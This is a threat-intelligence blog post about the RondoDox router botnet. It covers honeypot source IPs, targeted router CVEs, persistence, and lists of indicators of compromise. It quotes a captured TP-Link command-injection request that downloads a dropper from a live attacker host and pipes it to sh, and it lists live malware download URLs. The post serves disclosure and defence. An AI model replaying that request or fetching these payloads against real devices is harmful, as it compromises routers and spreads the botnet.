Skip to main content

RondoDox Botnet: Rando In Your Router

The RondoDox botnet is a network of compromised Internet-connected devices, including MIPS-based embedded systems such as routers and IoT devices. Our honeypot data has observed attempts by RondoDox to compromise systems, demonstrating exploitation of vulnerabilities or weak credentials to gain control over devices that can then be used for activities like DDoS attacks, spam campaigns, credential stuffing, or illicit cryptocurrency mining. Since June 2025, Sicehice has seen an uptick in exploitation of common router CVEs that lead to RondoDox botnet infections. The malware itself infects the target device with a dropper-like shell script which facilitates the download of a final stage payload.

Sicehice observed the first evidence of RondoDox as early as 2025-06-04 02:43:31. The following source IP addresses are the origination point of the activity:

IP

AS

Country

45.135.194.11

AS 51396 (Pfcloud UG)

The Netherlands (NL)

45.135.194.34

AS 51396 (Pfcloud UG)

The Netherlands (NL)



We note that the two IP addresses are in the same /24 subnet. Looking at other IPs involved in exploitation activity from the same subnet, several additional IP addresses of interest appear. Although none of these IPs are confirmed to be RondoDox, the patterns show an organized effort where the threat actor operates from IP addresses in AS 51396 (Pfcloud UG):

45.135.194.7

45.135.194.10

45.135.194.28

45.135.194.43

45.135.194.8

45.135.194.13

45.135.194.31

45.135.194.53

45.135.194.9

45.135.194.23

45.135.194.33

45.135.194.156


The following request is an example the rondo.sh dropper being downloaded from 45.8.145.203 and subsequently executed:
 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F45.8.145.203%2Frondo.sh%29%20%7C%20sh%20-s%20tplink.8080%3B%29

Decoded: /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall -9 mipsel mpsl;(wget -O- http://45.8.145.203/rondo.sh||busybox wget -O- http://45.8.145.203/rondo.sh||curl http://45.8.145.203/rondo.sh) | sh -s tplink.8080;)


In our payload captures, we have seen RondoDox targeting various router manufacturers, including but not limited to: Dasan, ZyXEL, Four-Faith, LB-Link, TP-Link, NETGEAR, D-Link, and Linksys. While the dropper scripts exist in many forms and appear to be targeted at the various router manufacturers, below is a screenshot of a generic RondoDox dropper shell script:


Once the dropper is executed, a final stage payload is downloaded for the target system’s architecture. Fortinet previously published a great article on RondoDox where we note the same C2 by using the XOR key “rondo” to decode the C2 address:




While the sample detailed by Fortinet has the same C2, we also observed other samples that have a different contact email address (bang2012@protonmail.com) listed under /tmp/contact.txt:




For persistence, we see /etc/init.d/rondo being created to include a startup script that allows the malware to run at boot:




We have identified the following products and associated CVEs being targeted by RondoDox:


URI

Product

CVE

/GponForm/diag_Form?images/

Dasan GPON routers

CVE-2018-10561

/UD/act?1

ZyXEL/eir D1000 routers

CVE-2016-10372

/apply.cgi

Four-Faith routers

CVE-2024-12856

/cgi-bin/ViewLog.asp

Zyxel P660hn-t V1 routers

CVE-2017-18368

/goform/set_LimitClient_cfg

LB-Link routers

CVE-2023-26801

/tmUnblock.cgi

Linksys E-Series routers

CVE-2025-34037

/cgi-bin/luci/;stok=/locale?form=<truncated>

TP-Link Archer AX21 routers

CVE-2023-1389



Indicators of Compromise

IOCs gathered from our honeypots have also been added to a VirusTotal Collection.


Dropper URLs:

http://38.59.219.27/rondo.eir.sh

http://38.59.219.27/rondo.gpon.sh

http://169.255.72.169/rondo.sh

http://38.59.219.27/rondo.trueonline.sh

http://38.59.219.27/rondo.linksys.sh

http://78.153.149.90/rondo.mipsel

http://38.59.219.27/rondo.lblink.sh

http://154.91.254.95/rondo.mipsel

http://38.59.219.27/rondo.jaws.sh

http://38.59.219.27/rondo.dlink.sh

http://14.103.145.202/rondo.sh

http://14.103.145.211/rondo.sh

http://37.32.15.8/rondo.sh

http://38.59.219.27/rondo.tplink.sh

http://45.8.145.203/rondo.sh

http://38.59.219.27/rondo.avtech.sh

http://38.59.219.27/rondo.tbk.sh

http://38.59.219.27/rondo.dlink.sh

http://38.59.219.27/rondo.netgear.sh
http://38.59.219.27/rondo.lol

http://38.59.219.27/rondo.netgearcgi.sh http://38.59.219.27/rondo.tr.sh

Payload URLs:
http://154.91.254.95/rondo.mips
http://45.8.145.203/rondo.mipsel

http://45.8.145.203/rondo.mips

http://45.8.145.203/rondo.x86_64

http://45.8.145.203/rondo.armv4l

http://45.8.145.203/rondo.armv5l

http://45.8.145.203/rondo.armv6l

http://45.8.145.203/rondo.armv7l

http://45.8.145.203/rondo.powerpc

http://45.8.145.203/rondo.powerpc-440fp

http://45.8.145.203/rondo.i686

http://45.8.145.203/rondo.i586

http://45.8.145.203/rondo.i486

http://45.8.145.203/rondo.fbsdamd64

http://45.8.145.203/rondo.fbsdi386

http://45.8.145.203/rondo.fbsdpowerpc

http://45.8.145.203/rondo.fbsdarm64

http://45.8.145.203/rondo.arc700

http://45.8.145.203/rondo.sh4

http://45.8.145.203/rondo.sparc

http://45.8.145.203/rondo.m68k

IP Addresses:


IP

AS

Country

14.103.145.202

AS 4811 (China Telecom Group)

China (CN)

14.103.145.211

AS 4811 (China Telecom Group)

China (CN)

37.32.15.8

AS 202468 (Noyan Abr Arvan Co. ( Private Joint Stock))

Iran (IR)

38.59.219.27

AS 4226 (SUMOFIBER)

United States (US)

45.8.145.203

AS 44477 (Pq Hosting Plus S.r.l.)

The Netherlands (NL)

78.153.149.90

AS 207713 (Global Internet Solutions LLC)

Russia (RU)

154.91.254.95

AS 54801 (ZILLION-NETWORK)

Seychelles (SC)

169.255.72.169

AS 327829 (SKYTIC-TELECOM)

Congo Republic (CG)

83.150.218.93

AS 199415 (Association YORKHOST)

France (FR)

45.135.194.11

AS 51396 (Pfcloud UG)

The Netherlands (NL)

45.135.194.34

AS 51396 (Pfcloud UG)

The Netherlands (NL)


Hashes:

3fd6d20d5639dd4bf04b2cf229a547a7ba2d1daf90efafb43ca94ac8007fd4c9

0034fc44a680a82c0eb4363f4518ae440762e01be889578cb7c97b95addcb7a4

0afe0aa708c4c4ea25f9a469a966131e71ee4577b0565907506ec95de706c7fa

20d7381289a69bf1ac872115966c077a0ddc051cdaa471f84c3de001730fc329

2e50ce7e9006e54230f1f4a41834c9f399d4827c76adac7856ec886bbaee74e2

30b920be901552efe10e1a31aa0bcf1cc1a6d80362a05b18f389e50d708a820f

4936b3dcd458b3f456a70d0bfaaf65e0fe2ebff1ceb7749d99728383252cd6ff

4d65dab6ddb631b0cd6ef02ae2cb27074a3fff5ac994040e7da7e33d7f29e1ce

4faf724e04f2f99bebda866ae0524daac68a4fd39978cd184f0d0e220089338a

51aaeaee8247d57cc00eda44eff6cbdb6cf34106f14c2f4fc8aeb07e57ac9182

53ee0597b17f04e64c13610d197a01c9c77b1f9091469e2791ac0f50d00589ec

73d874fd4a47cc0f87a018abfeff6d95a0b44c92aac7b0e167f362faebf27ae5

7562196faa42a7b48025e23cbf339fb037fc113a7865fdfb7a1e046d35fc31af

790c702a2a0555ad5e2247529bea874a13b54f7c110eafa983812875de5c7c8a

9d715717f22571f1f1e0ab1fb7e4aec3f51518eac3836b34cad802a2e7c6618b

c208e4dab23f467b8f819c87425f6c447572958aa3213d7700378eb3fec4ed5a

e9546bfe823ae24c15943d4e172ea10c02f8b605f60670bf41e5c057d4a19ccc

f5ae13a01b9c45aa255a6203cc6d1258114979f37c187c42ec40aa5f131a0ae4

001743bbcfc3805b1f865fe5bb533743e455bc2252606f2e8ab86d8e625b34ed

69b7b0f6c1cbe388d99be2e66b72cee9ca51558b4c6f389b8748a0b2afa572d1

7fb1e4a7d4d96ae8404aebbf077676508b2e5f84a70a97d30fc3a2db332f0d8c

c9e816f9ba0c1d014d9b236cd36856b1bfb45773c81a8ea8d13be6b69df8310f

7baae9268ad6cbb10796e512aee8492563ae51de51419b07070d9f304ef2d4fb

73b76e823102234976582ab15c8176e2774b82f1f0c210667cb062803ae35110

9efcfcd7077971b27a20641ad07190fd35b5b556ed1a8c11ab464b292172b584

1d3ef63acfa182090031dc46778115c1aa02c0275d28ff5075e5d530c6c58eeb

9c48fc8f842c8303b2e81ad3e23689d6671fdf4031028dd0b6bfdcabd69952e1

02b8e42bd9a5e3d1901778efaf5d77379d5f552fdce6339c16d924e6979a4a71

0772e696320efd1a16d6e2d93aa3f017c6f9f65e94973705dd53add1b077154f

baf28acbcf119f97b8207af98e70f36d24ae79d804d09c1f2babe0de64d7734e

03195acd014251078307590378cc5f7f60e1ca3a36cd3b6b8c3ad246bb32fa8f

d8dacd72670db9408a58d3940f2181dbcbebd21e1745c78814493af86a4cfcef

56c2a58c3c496658e5d5f40797ba60bf4780b5f7c24c03c079a63f21866ce621

5bc8cbc0f2ad8000925becde0cdbdb27edaf29ab25e7c2aedb01cb4af517876a

61d68150b621cae25a384bee94fca8cd694ad301dd66da599549769b0351446b

d90e3e5d4ee6f117c3e12cf347de4c8fb93213c0bbe7997c517a46e7f1300043

b01e2a0b1f3ab9583a8e7a521443043adf414ecfdfa1caf21f82e24db59c7148

f23f75ce80d11f4b0c1a2db424b18c1599d8f653b0c1e3c2872864d20963b1bd
0007753861fb69c10422b231e0936ce160ccae376283468d418896e101428ea8

08519b74c9a3473f819f1dbd64834a370b2e98a0928c2511f2ef285e969c24f2

d7fb0101fdd546b0cfffb58d966aa89b67ae390f2a6df67717c6e10249c30aae

7ee0b668fc285da89a5c614255235383abc4efba2d91068586e22fa148371283

bd658bb0838715790742595fe1f1d0434a8da3dfabaa425c83f93a057e7ac117

4e610155e467f6558f2b7932a56e8b9a468ccc5f0ce27436775918bb0d04d17c

73b76e823102234976582ab15c8176e2774b82f1f0c210667cb062803ae35110

9efcfcd7077971b27a20641ad07190fd35b5b556ed1a8c11ab464b292172b584

1d3ef63acfa182090031dc46778115c1aa02c0275d28ff5075e5d530c6c58eeb

9c48fc8f842c8303b2e81ad3e23689d6671fdf4031028dd0b6bfdcabd69952e1

cec824ab28382492bc235995df23dbf0b81d01094b18c24e4f4dbe802bf96c49

b9d5eba1c7d8211c0dcaaf6f6bf4cf2fa5f4db503d40483fca70496a056f9f7b

e0956d116efc1865e1ec9720686696c88ad4296dec34a397d5c81c05831d759e

db51cdb7ad9b996b89dee1a188c14497acbbafee528f42d22fb5cccf3118ecd9

b003558a360ba3f43fb4202a05dbb0398443de6456b1f1537a4d5f4eabd1edef

7f15a708d741f589a9bcfcc334e1c6b54361117ff2d35956cd9ea4cce81ae3af

d93c04a7d0fb1b3e842bc9356ff4b4ada61c733071733ee21861423c092ed6f2

bd1bd6a9f37a3439d3615e2cb66cbc3b1b0b97797253a7d1ddfe005d1dd8d0c6

547255b76fa3f353eac1dd217beeaae12ab1cd0bd93e27614f352cab91ad46fc

eb2290ee4b876b8163f4f7bbe3e516d14f0ea4481f7e6865376e2bea32f40a16

ac8bd1bea0e83594634e5a306db9c72572d320bdd05fd14a738f1c12c0e6417c

f39f03bd5e699109a36a401f97b28d018c42471925ee31113718927265fbe208

27f3d4c5f1976ca46d7c3c59126bbff8c830ae8d5d4d7d57f5331b10e896edbd

17437f3b6c0392a028b98be3d444214be768701e159f14d27f149fd83e9b83f6

200a19acab235a0bfc3a29c4a3ce7a8c5161b50e2cdb114214edb1b5b732a57f

1ce7abdd84e3b0257f3b0bc94840102e5ec4656653e6787cde9f19759f4e1d1b

8c13fa76c638605ebf1f6fb3daf56c82f46c33c38c5b1de97a165ff24b58a3cd

9c8a2e8bbe3e60a2aef4f60db70289c148bb78f9caa1f888ac842b01f259793e

859003f77aef6dc42b48fb8d47d0925017f99e258eafcc6869e790037b8c15e1

91d1b3fc5a83375935e55d9fb361e164e39f007aecb52e40318af1f8aea08493

7db37d544c3024a6d45811d392e7af39758da215ba0b1d710ebfb9b8927a21b8

a3f8251498ae22abeec5e4ec9fdef4b0aa1267e2ad7974175ec2836e5d58969c

fe629f765c8bd1e1cbf1219a84509b87abb611550827d019a9954a9df1a480e9

e2f94b0b0e2832d6b06e0838fbf7a5b1f1c46e3aef64fe1140e513101d172e1e

7f28d9922662307156b5d5cd1c217e724a23466bab5bb03bd29f098b7e8251b0

7eb28f8435f8eb1e1c942c0524e9f3e88a0a17c6216792d3e0da1265eadf8cd6

2b1eaebc35398cbeab8a5b030ed415f4e2dcd8fd3cd204dcd1b0b1138cf6ece4

42b0e1d9ed68abba7a95872680029f336c792d131a630d8c92cc273e12f6af1d

90cefb4342d4310564242d71a9457c5e27548c2b5a804b0483d6cc62174c4045

d6078e57d823ddbed6fc6a67a867f72f33b934da42788f61f45e454b34dcad59

3b9d5c5031345255075e97b49edf9a6caff3144a142693cf63fd27faf8b98445

001743bbcfc3805b1f865fe5bb533743e455bc2252606f2e8ab86d8e625b34ed

69b7b0f6c1cbe388d99be2e66b72cee9ca51558b4c6f389b8748a0b2afa572d1

7fb1e4a7d4d96ae8404aebbf077676508b2e5f84a70a97d30fc3a2db332f0d8c

c9e816f9ba0c1d014d9b236cd36856b1bfb45773c81a8ea8d13be6b69df8310f

7baae9268ad6cbb10796e512aee8492563ae51de51419b07070d9f304ef2d4fb

73b76e823102234976582ab15c8176e2774b82f1f0c210667cb062803ae35110

9efcfcd7077971b27a20641ad07190fd35b5b556ed1a8c11ab464b292172b584

1d3ef63acfa182090031dc46778115c1aa02c0275d28ff5075e5d530c6c58eeb

9c48fc8f842c8303b2e81ad3e23689d6671fdf4031028dd0b6bfdcabd69952e1

02b8e42bd9a5e3d1901778efaf5d77379d5f552fdce6339c16d924e6979a4a71

0772e696320efd1a16d6e2d93aa3f017c6f9f65e94973705dd53add1b077154f

baf28acbcf119f97b8207af98e70f36d24ae79d804d09c1f2babe0de64d7734e

03195acd014251078307590378cc5f7f60e1ca3a36cd3b6b8c3ad246bb32fa8f

d8dacd72670db9408a58d3940f2181dbcbebd21e1745c78814493af86a4cfcef

56c2a58c3c496658e5d5f40797ba60bf4780b5f7c24c03c079a63f21866ce621

5bc8cbc0f2ad8000925becde0cdbdb27edaf29ab25e7c2aedb01cb4af517876a

61d68150b621cae25a384bee94fca8cd694ad301dd66da599549769b0351446b

d90e3e5d4ee6f117c3e12cf347de4c8fb93213c0bbe7997c517a46e7f1300043

b01e2a0b1f3ab9583a8e7a521443043adf414ecfdfa1caf21f82e24db59c7148

f23f75ce80d11f4b0c1a2db424b18c1599d8f653b0c1e3c2872864d20963b1bd

Emails:

bang2012@protonmail.com
vanillabotnet@protonmail.com

Popular posts from this blog

AndroxGh0st – Stealing your AWS Key Pairs for Simple Email Service

AndroxGh0st is a family of malware written in Python that notoriously targets Laravel .env files. Since the inception of our new fleet of web honeypots deployed in December 2021, Sicehice has detected this activity and observed tens of thousands of requests with the HTTP POST body set to 0x[]=androxgh0st . Searching this string on GitHub yields various repositories, many of which help identify AWS secrets inadvertently exposed by the Laravel framework. One feature of AndroxGh0st is the ability to search for exposed AWS credentials, namely looking for AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY identifiers. While individuals may mistakenly leak their key pairs to version control repositories such as GitHub, GitLab, or BitBucket, there is always the possibility of inadvertently leaking key pairs directly on web servers as well. AWS has gone through efforts to continually scan GitHub for AWS key pairs and automatically apply the AWS managed policy AWSCompromi...
Post a Comment
Read more

Pivoting on a Phone Theft Ring

One of our affiliates recently had an iPhone stolen while on vacation. It goes without saying, once the phone has been turned off and you can't see it in Apple's Find My, best of luck getting it back. One of the issues with stealing an iPhone is the iCloud Activation Lock. When you enable Find My, the device is linked to your iCloud account and you must manually disable it before the phone can be transferred to another person.  A few days after the phone was stolen, the new phone received an SMS phishing message with the following URL: hxxps://lcoud.com-1pr7[.]us/?id=XXXXX In our instance, we had a five-digit ID number that started with the number 8. We began to attempt iterations of the 5-digit ID and sure enough, we got a valid HTTP 200 response on the first attempt: When navigating to the resolving IP, we noted there was a wildcard certificate in place for a bunch of other domains: Stepping back, let’s look at the root domain of the original phishing page, com-1pr7.us . The...
Post a Comment
Read more

Inside a Compromised RDP Server - Bruteforcing Leads to LockBit Ransomware

As people trend towards remote work, IT departments have an ongoing need to provide remote services to end users. Without the use of traditional VPNs, technologies like Remote Desktop, Citrix and VMware are commonly used for remote access. However, they are not always configured in secure ways.  During the height of the pandemic, we setup two servers with Remote Desktop exposed to the Internet and created user "hello" with no password. Obviously, this is not a smart idea, but it does demonstrate what can happen when you have unsecured assets that are available directly on the Internet.  Scenario 1: Network Scanner Resulting in Abuse Complaint A scanning tool was used to scan for other servers listing on port 3389, which resulted in a complaint from Hetzner Online GmbH. The complaint was as follows: Figure 1: Abuse Complaint Received It is good that Hetzner has automated monitoring systems that will send abuse complaints automatically and one step in the right direction to...
Post a Comment
Read more